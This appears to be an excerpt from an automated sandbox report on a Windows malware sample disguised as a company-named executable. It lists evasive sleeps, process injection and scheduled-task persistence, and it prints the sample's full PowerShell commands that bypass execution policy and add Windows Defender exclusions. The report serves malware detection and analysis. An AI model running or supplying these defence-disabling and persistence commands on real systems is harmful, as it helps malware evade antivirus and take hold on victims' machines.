Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 26C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1770000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 7BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: D660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2B50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 11B0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4111	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 795	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6522	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1366	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Window / User API: threadDelayed 2887	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Window / User API: threadDelayed 6926	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8827
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2461

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 1892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep count: 4111 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep count: 795 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720	Thread sleep count: 2887 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720	Thread sleep count: 6926 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 8827 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 650 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 6148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7584	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory written: C:\Users\user\AppData\Roaming\RTUZKYTc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
